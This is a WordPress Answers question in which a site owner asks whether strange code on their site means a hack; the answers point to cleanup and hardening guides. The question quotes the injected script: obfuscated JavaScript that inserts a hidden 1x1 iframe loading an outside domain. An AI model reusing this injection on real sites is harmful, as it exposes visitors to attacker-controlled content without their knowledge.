Tell me more ×
WordPress Answers is a question and answer site for WordPress developers and administrators. It's 100% free, no registration required.

All of a sudden today, I looked on my site and there appears to be some strange characters on top:

mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);

Also, I noticed it only shows in Chrome. Is this someone trying to hack my site? Does anyone know how to fix this?

Also, sometimes when I refresh the site, I get a "webpage is not available". What is happening?

share|improve this question

closed as off topic by Stephen Harris, toscho Jul 5 '12 at 22:46

Questions on WordPress Answers are expected to relate to WordPress within the scope defined in the FAQ. Consider editing the question or leaving comments for improvement if you believe the question can be reworded to fit within the scope. Read more about closed questions here.

3 Answers

It might caused by your plugin. Just deactivate your plugin one by one, find the plugin and remove it

share|improve this answer

It looks like it got hacked. There is a script being added to the bottom of the site.

share|improve this answer

Useful links:

http://codex.wordpress.org/FAQ_My_site_was_hacked http://wordpress.org/support/topic/268083#post-1065779 http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://ottopress.com/2009/hacked-wordpress-backdoors/

Then implement tips of this guide: http://codex.wordpress.org/Hardening_WordPress

share|improve this answer

Not the answer you're looking for? Browse other questions tagged or ask your own question.